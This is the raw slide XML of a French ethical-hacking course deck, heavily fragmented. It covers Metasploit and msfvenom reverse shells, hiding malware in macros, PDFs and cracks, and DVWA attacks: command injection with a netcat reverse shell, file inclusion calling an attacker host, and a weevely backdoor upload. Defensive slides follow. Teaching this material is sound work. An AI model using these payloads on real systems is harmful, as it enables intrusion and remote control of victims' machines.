              <a:rPr lang="en-US" sz="1800" b="1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777 /home/kali/Desktop/something32.exe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le programme d’ecoute (search + use peut être aussi utilisé)  :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exploit/multi/handler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payload windows/meterpreter/reverse_http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lhost 192.168.113.133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lport 80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exitonsession false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-j –z</a:t>
            </a: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Problem Resolution : https://null-byte.wonderhowto.com/forum/problem-with-msfvenom-windows-7-64-bit-exe-version-file-is-not-compatible-0177363/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https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/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DOC2 : </a:t>
            </a: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https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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DOC3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https://medium.com/securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6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61" y="0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Msfvnom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local ou vers internet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09" y="1862846"/>
            <a:ext cx="11992947" cy="5921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au victime : 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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-F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Puis selo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les machines trouvées :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 i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 i : le numéro de la machine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Tapez la commande help pour plus d’éclaircissement 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9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289C5-B609-B06A-343B-8352B0D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 de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51068A-9E27-AFFE-1406-BD45F05B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B57EE-8478-9156-C568-9E46309A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964544"/>
            <a:ext cx="12192000" cy="29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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="489533"/>
            <a:ext cx="105156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étapes de l’éthique hacking (web, système, application, …) : </a:t>
            </a:r>
            <a:b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838199" y="1820701"/>
            <a:ext cx="10787743" cy="47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l’exploitation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post-exploitation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(CYBER KILL CHAIN)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6CF135-408D-EE4F-2F40-B7F1934F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Worm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Virus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Trojan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Ransomware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Tools)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Keylogger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Backdoor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004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4BB79-7A91-D2CF-9433-A88E51FA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AF5FC-63E4-08F9-B932-75A94652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5007F4-0F56-C334-47D1-99BB28C1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A94907-CCB2-37D7-CBD4-C43E83E0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2" y="874385"/>
            <a:ext cx="6829168" cy="58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80DF3-8536-3FFF-494C-45023F5C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FUDDING : Cacher les programmes malveillants dans d’autres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D095F-8773-4C5C-8DB0-AEDC94A8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macro de office par exemple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PDF :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fichier binaire (les cracks surtout et les faux mise à jour des antivirus)  : Pire encore dans un OS (reverse engineering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injecting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virus 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binaries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1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F5DD0-A99F-ED39-15AC-50F797BD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backdoor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5B3B3-70AE-EFEF-03AC-600D4F3C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(lien1 en description)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–v –l –p 9001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cible (lien2 en description)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30853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D4FA-2248-CEBB-E6A7-C726D789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595D2-36BB-4939-4B49-3767FF24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Pièges internautes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689A6A-F0D4-1D8D-0DF0-F2CEF255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5B89C-C3DE-529A-4065-34AD809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874384"/>
            <a:ext cx="11745613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717D-ED87-A755-945A-2DF19A16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web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87B0B4-FC5F-EA36-BFA6-0A29DED6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924050"/>
            <a:ext cx="10727820" cy="2388458"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397592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108AF-CBC3-CB48-ABB4-831C790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: COMMENT CRÉER DES FAILLES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13333-E4EE-13C9-B988-3E9F510B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(input)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(output)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des inputs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 de processus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oscp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274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95094-D9EE-3917-8688-E70E4040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de vie de logiciel &amp;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6B302-F160-60F9-7AE6-42BB54B9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E7072-15DA-71D1-26AF-98CA3387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3"/>
            <a:ext cx="8193216" cy="43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7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D6DF0-DDED-F58A-BB4F-35BF5A51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CVE et CVS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62D96-AEE6-00D8-8E9A-6452E145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ou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utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185799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56A41-2084-2667-D654-2B9CD5FC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Protection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13E923-341E-AA1A-378F-3E05A033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Antimalware, pare-feu, IDS, chiffrement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signature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comportement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Heuristique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317868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Manuelle ou automatisée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Existence des résultats positif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Attention au hackback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C4B21-B604-090D-B732-BD49CAD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0-day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A89E0-5EE0-C877-FFDE-D62059D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59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C3FFD-5540-B0B2-C372-4223160E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9F141B-297C-C2DC-A4F1-58239ED5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EPP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Historisation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137191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51215-618B-051B-A654-7128104F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CONTRE LES INJECTIONS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1B0149-0F3E-E4FA-E65C-63F26031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ORM et Framework avec ORM pour SQLI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273696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BRUTE FORCE ET INJECTION (DVWA)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54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antérieure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Voir lien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56617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admin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32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wfuzz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(à faire)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83108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Regarder OWASP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back end tester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 –c4 127.0.0.1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pipe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 –c4 127.0.0.1 |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74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41024" cy="41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1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 : | ou || ou &amp; ou &amp;&amp; ou ;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cat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whoami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hostname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ifconfig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,,/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 &amp;&amp;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hacked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exploitation</a:t>
            </a:r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Eliminer les faux positifs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Sauvegarde obligatoire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la machine attaquant : </a:t>
            </a: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nlvp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1337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l’entrée de la fenêtre web : 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 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-e /bin/sh 192.168.32.130 1337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se passe t-il pour medium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39673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FILE INCLUSION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http://192.168.80.134/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/fi/?page=../../../../../../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62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CB0B3-DB19-AE56-B988-DC4AD345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RFI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CBE7C7-261A-112E-C3D3-F8F81153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72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 un fichier vers le serveur pour être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executé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php.include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77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1135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-m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9000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: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192.168.113.132/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/fi/?page=http://192.168.113.133:9000/up.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599388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UPLOAD AVEC WEEVLY BACKDOOR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10988" y="1690688"/>
            <a:ext cx="113762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weevely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abcxyz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http://192.168.113.132/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/../../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hackable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s’y connecter : </a:t>
            </a:r>
          </a:p>
          <a:p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weevely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http://192.168.113.132/dvwa/hackable/uploads/up.php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abcxyz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8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E7264F5-4E97-0FE9-B26F-6CD544C77297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832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fichier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malvaillant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executé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 le serveur)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117" y="1690688"/>
            <a:ext cx="115868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malware : </a:t>
            </a:r>
          </a:p>
          <a:p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msfvenom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LHOST=192.168.113.133 LPORT=4444 -f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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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exploit/multi/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lport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4444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lhost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192.168.113.133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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4174859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10014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DVWA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2020094"/>
            <a:ext cx="3695700" cy="1333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72" y="5016500"/>
            <a:ext cx="78581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6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1#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2#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3#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user,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user,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9" y="-12700"/>
            <a:ext cx="37147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Outils de reconnaissance</a:t>
            </a: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Whois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netcraft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Nslookup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AMELIORATION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des modes inspections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developpeurs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OWASP ZAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757039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 (utilisation de MFA par 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ORM ou DBOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1208626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E2AEC-590F-6CF0-AEC5-F57DDE32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(Installation dans le server)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5FB3B0-B92C-B7CC-59AF-CEEF587BD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8" y="1825625"/>
            <a:ext cx="11709918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https://www.linuxbabe.com/security/modsecurity-apache-debian-ubuntu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https://kifarunix.com/install-modsecurity-with-apache-on-ubuntu-22-04/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: 127.0.0.1/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index.html?exec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=/bin/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key : « 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WAF »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 serveur VPS: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https//www.digitalocean.com/community/tutorials/apache-configuration-error-ah00558-could-not-reliably-determine-the-server-s-fully-qualified-domain-name </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1895361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byPASS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875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9567" y="365125"/>
            <a:ext cx="12082071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RESUMES EXPLOITATION DE VULNERABILITES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999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D6DF0-DDED-F58A-BB4F-35BF5A51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CVE et CVS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62D96-AEE6-00D8-8E9A-6452E145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ou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utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1839133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C4B21-B604-090D-B732-BD49CAD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0-day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A89E0-5EE0-C877-FFDE-D62059D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2840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A94DF-1468-372C-4881-3F15DED8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Bug Hunting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0DBBC-B5D1-E5B5-546B-17D56915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Plateforme de bug hunter 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dirty="0"/>
              <a:t>Orienté web : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hackerone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>integriti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>zerodium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> …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dirty="0"/>
              <a:t>Orienté système : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>zdi</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réduction de prime : mutualisation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> privée (top du plateforme)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25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D9B18-0BD2-676C-292F-01D27ED2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C8595C-DBAA-B936-67D5-F106B474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154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317A0-73CB-0F79-6107-2A306384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CC7BA-7BD1-708B-B50F-7EC8C521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E3A6A3-3929-14E0-F0A0-2B0BB733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32830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85698"/>
            <a:ext cx="6536724" cy="314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B824F-C5BB-12DD-511F-05FF0127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ADCF-8FA1-A092-774C-BD8B4CB8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B2F42-971C-F69A-4959-6B707465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3FFD41-C5E4-468C-EA9C-BBF2235B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9044"/>
            <a:ext cx="6316774" cy="50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7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B156-23AC-A58F-08E8-C1B96733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7384"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Domaine à sécuriser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9CFC5C-135A-7CD5-370C-CEDFA619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70F3B7-68D5-9C8B-F0D5-25FCED95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6" y="1413690"/>
            <a:ext cx="8232071" cy="50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5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9C909-A5C1-04A3-CBBC-BE824ED6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3ECB8-764B-36D6-CBBD-AC579FA6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DAFDFF-EBDA-707A-ABAF-1AE691F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1383956"/>
            <a:ext cx="11205814" cy="34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249B-8280-58F1-8917-A61BE62D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7B475-67B1-E081-A9AC-096C218A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66BF44-D971-E3AE-10DE-C43F04C7A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DAF33B-3CB0-C3B7-366D-17EB3E58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988905"/>
            <a:ext cx="7599406" cy="56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1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0847-CA93-BB78-1140-D9BAF4CF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78AB5-84F2-D331-E38E-614E8917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E2277-BCBA-86C4-B923-1084D3F67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EE627-96B2-F97B-6D52-2C060A61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254210"/>
            <a:ext cx="8275166" cy="2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6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45DC-E2DF-D23E-EEB0-1F026A9E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673EE-C5A2-83FF-5EE9-D0516647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FECB3-4DE0-65D0-6E86-61EE2329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E38EA7-2D0C-77C0-7970-CF9AB668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28725"/>
            <a:ext cx="9939433" cy="42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4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18C3-921B-4EAF-1701-20C5A3AF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AE69-8848-2488-219D-5A868306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CFD21D-983D-6484-A588-A27177948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02A159-AE03-6ED1-8C9A-0B73F82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1297459"/>
            <a:ext cx="9593715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5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196B-C34D-F32D-D416-F9BDBDAA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CB697-7414-A1C0-5DEC-2D7A6DC4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ACEC24-A03D-379D-9921-903A77F1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7B17DC-6FC4-5B00-6538-EB82724D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0554"/>
            <a:ext cx="8849497" cy="24207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EC51A6-C038-E5B5-C5D7-AFF23422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712988"/>
            <a:ext cx="8651376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5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95D0-ACC9-9B4A-8B0A-FE2F8BA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1D09F-A917-3E35-E882-E94C860A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F152B-E481-918F-F004-D73EC32F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296"/>
            <a:ext cx="9145648" cy="54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5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64444-BA29-EB26-9BE8-DE16677B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4E972-5E43-9CAF-050C-F8F7F842E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13506-38F7-C902-131D-973C017C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67535"/>
            <a:ext cx="10072560" cy="53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4241"/>
            <a:ext cx="12192000" cy="446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AC6DA-35A9-37A6-FE5C-8B445044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DE39C1A-D50F-458B-5A09-09FFE050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805" y="0"/>
            <a:ext cx="10211984" cy="5600120"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1903802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41064-E5C0-20C7-7B22-4E206F78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CBF6C-7831-41FF-64C1-6D4A5432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E10DE7-D9BE-1F5D-DE1B-946FCDB7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86603"/>
            <a:ext cx="10331896" cy="53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05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F437F-5349-739D-14F4-C56FDE5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B3EC6-B4B5-95AA-AAA5-CFAE7A1A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E3753E-E943-21AA-14BE-2B03BC04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8795"/>
            <a:ext cx="10119360" cy="54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6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05F95-8BEA-12C0-F400-1E057973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17E98-D5D6-B575-93CE-8EB0DE00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4F51FC-1EFD-B802-AD27-D5597B18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191658"/>
            <a:ext cx="7743979" cy="65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1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02CCC-97B7-7562-7F0B-39656FE0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8A92D-9FF3-436B-325A-75831371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45F0AD-D012-5A2A-0986-6F3A9B42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700"/>
            <a:ext cx="5721178" cy="5207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EBC01A-A5D1-B5DA-7BFB-4E00EEE02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78" y="147405"/>
            <a:ext cx="6353022" cy="46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4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A65E7-CFE4-E459-5D62-94F744B0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721C8-68AD-92F2-DB23-4A5EE9E6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70E74D-D858-07C4-912E-5E2524A5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32" y="1845734"/>
            <a:ext cx="6870744" cy="47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5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08F13-DA77-AADF-8004-313FAABA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96F224-9D17-DF6C-6EE4-2BC9449D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197489-FA05-F592-283C-C6A86CB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961939"/>
            <a:ext cx="9981248" cy="36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1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83ECA-9598-11B0-5B96-5EE8D35D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B459A-6500-7CDE-8B17-D3E6DA786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7128F-E5F8-3DE9-B707-0EA8B3AC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2" y="1845734"/>
            <a:ext cx="9135289" cy="45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1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1B7D2-304B-4E33-16FF-D66AA388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(maj)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E7343-65F8-9697-FC51-75413759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959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68B8-180B-D867-ECC9-A139F9B2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30702-3364-A9A7-2FAC-F429C081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74255-89AB-F4ED-3A46-0CD98DDC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1845733"/>
            <a:ext cx="6794826" cy="47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37" name="Google Shape;5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" y="2533814"/>
            <a:ext cx="12192000" cy="302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D1C1-2A88-A35E-BBF2-5DFE9674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EC69C-95E7-D531-AEB4-C5E1600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052E3-344F-2479-DCF1-881E4792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C6E7F1-AEDB-5DDA-1E06-3243E908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5416"/>
            <a:ext cx="7404169" cy="48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8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2F45-6884-ACDD-066E-D86C87AC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211F9-5A96-013C-5CA1-4EE5EB92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F318AA-4273-6646-F33B-39D979AFC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6976B4-D173-47D1-C42E-39A98CB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19275"/>
            <a:ext cx="7428882" cy="45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1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3D74D-A989-96BA-08D8-6CFC942A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804EC-5633-3FBC-2FB8-DB517AFC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A841D-35AC-EF0F-95D4-B98C3500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8849909" cy="4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0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75182-AD3F-10FC-05B2-AD12B67D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F1F6A-C755-492B-2D71-A050DAC1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A3813-4468-4BA5-2D3F-6CCBC60E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EF399-0BB6-3D9B-5125-20D6E77C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70"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="1845734"/>
            <a:ext cx="7080834" cy="4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CEDF-9526-4ED3-3DD0-A1F0592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D1C2A-E431-3FAA-EACF-BA60B803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CD5C1-E661-7C74-2256-F3D35FDC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01680-1F12-E40D-E1D3-8E3091D2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9664"/>
            <a:ext cx="11008704" cy="2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5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99DE-D117-DF8D-E8AA-A5F57B02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8CF45-C08F-CEC7-B05A-1D2886C7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D1DBD-E112-597A-26A5-F5BA7FF6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FF23DB-DA67-BE30-7521-51B6DA6F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16" y="1845734"/>
            <a:ext cx="7290100" cy="50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1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F2BE1-9C25-8E68-9E70-815D40FA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intéressante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A4946-7883-B5B7-C46B-DBF1C51D6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Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Malware analyse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024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6F0E5-4258-6C4F-A974-3181A1AA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Certification et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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9EB1D-1330-CFFC-85E6-DDBBBBDE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85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43" name="Google Shape;543;p6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44" name="Google Shape;5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887" y="1737360"/>
            <a:ext cx="10659762" cy="50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2833</TotalTime>
  <Words>2903</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>468</Paragraphs>
  <Slides>87</Slides>
  <Notes>54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Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Rétrospective</vt:lpstr>
      <vt:lpstr>Ethical hacking CyberKillChain Attaques/Attaquants   </vt:lpstr>
      <vt:lpstr>Phase de reconnaissance  Phase de l’exploitation Phase de post-exploitation  (CYBER KILL CHAIN)</vt:lpstr>
      <vt:lpstr>Phase de reconnaissance </vt:lpstr>
      <vt:lpstr>Phase exploitation</vt:lpstr>
      <vt:lpstr>Outils de reconnaissance</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Injection SQL</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>Chaîne et requête</vt:lpstr>
      <vt:lpstr>SQL Injection (1)</vt:lpstr>
      <vt:lpstr>SQL Injection (2)</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>msfconsole pour la version console de metasploit</vt:lpstr>
      <vt:lpstr>Payload reverse shell et binding </vt:lpstr>
      <vt:lpstr>Msfvnom en local</vt:lpstr>
      <vt:lpstr>Msfvnom en local ou vers internet</vt:lpstr>
      <vt:lpstr>Base de donnée de CVE</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>Programmes malveillants</vt:lpstr>
      <vt:lpstr>FUDDING : Cacher les programmes malveillants dans d’autres </vt:lpstr>
      <vt:lpstr>Reverse shell avec netcat backdoor</vt:lpstr>
      <vt:lpstr>Pièges internautes</vt:lpstr>
      <vt:lpstr>Attaques web</vt:lpstr>
      <vt:lpstr>EXPLOITATION : COMMENT CRÉER DES FAILLES ?</vt:lpstr>
      <vt:lpstr>Cycle de vie de logiciel &amp; CVE</vt:lpstr>
      <vt:lpstr>Impact CVE et CVS</vt:lpstr>
      <vt:lpstr>Endpoint Protection Platform</vt:lpstr>
      <vt:lpstr>0-day</vt:lpstr>
      <vt:lpstr>Bonnes pratiques</vt:lpstr>
      <vt:lpstr>SOLUTIONS CONTRE LES INJECTIONS SQL</vt:lpstr>
      <vt:lpstr>OWASP BRUTE FORCE ET INJECTION (DVWA) </vt:lpstr>
      <vt:lpstr>Version antérieure </vt:lpstr>
      <vt:lpstr>DVWA</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>Commande injection</vt:lpstr>
      <vt:lpstr>COMMAND INJECTION</vt:lpstr>
      <vt:lpstr>LOW LEVEL PIPE : | ou || ou &amp; ou &amp;&amp; ou ;</vt:lpstr>
      <vt:lpstr>LOW LEVEL (netcat revershell)</vt:lpstr>
      <vt:lpstr>LOCAL FILE INCLUSION</vt:lpstr>
      <vt:lpstr>ACTIVATION RFI</vt:lpstr>
      <vt:lpstr>RFI</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>FILE UPLOAD AVEC WEEVLY BACKDOOR</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>AUTRES INJECTION</vt:lpstr>
      <vt:lpstr>SQL Injection DVWA</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL INJECTION AMELIORATION</vt:lpstr>
      <vt:lpstr>Protection </vt:lpstr>
      <vt:lpstr>WAF (Installation dans le server)</vt:lpstr>
      <vt:lpstr>WAF byPASS</vt:lpstr>
      <vt:lpstr>RESUMES EXPLOITATION DE VULNERABILITES</vt:lpstr>
      <vt:lpstr>Impact CVE et CVS</vt:lpstr>
      <vt:lpstr>0-day</vt:lpstr>
      <vt:lpstr>Bug Hunting</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Comment améliorer la securité</vt:lpstr>
      <vt:lpstr>Comment améliorer la securité</vt:lpstr>
      <vt:lpstr>Domaine à sécuriser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Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Audit de la sécurité Interne</vt:lpstr>
      <vt:lpstr>Mise à Jour (maj)</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SURETE DE FONCTIONNEMENT</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SAUVEGARDE</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>SECURITE DES ACCES</vt:lpstr>
      <vt:lpstr>Pratique intéressante</vt:lpstr>
      <vt:lpstr>Certification et lab en ethical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237</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-24T07:42:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T01:41:04Z</dcterms:modified>
</cp:coreProperties>
</file>